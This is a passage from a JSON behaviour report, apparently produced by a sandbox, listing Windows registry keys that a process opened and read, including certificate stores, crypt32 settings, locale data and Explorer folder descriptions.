        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\#16",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllOpenStoreProv\\Ldap",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllOpenStoreProv",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root",
        "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root\\PhysicalStores",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\Root",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\SmartCardRoot",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA\\PhysicalStores",
        "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\CA",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllVerifyCertificateChainPolicy",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllVerifyCertificateChainPolicy",
        "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime",
        "HKEY_USERS\\S-1-5-21-3318940731-3379818400-2144845357-1002",
        "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl"
      ],
      "read_keys": [
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\STE",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\MDMEnabled",
        "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\Disable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\DataStore_V1.0\\DataFilePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane1",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane3",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane4",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane5",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane6",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane7",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane8",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane9",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane10",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane11",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane12",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane13",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane14",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane15",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\LanguagePack\\SurrogateFallback\\Plane16",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions\\000603xx",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru-RU",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\ru",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir (x86)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource",
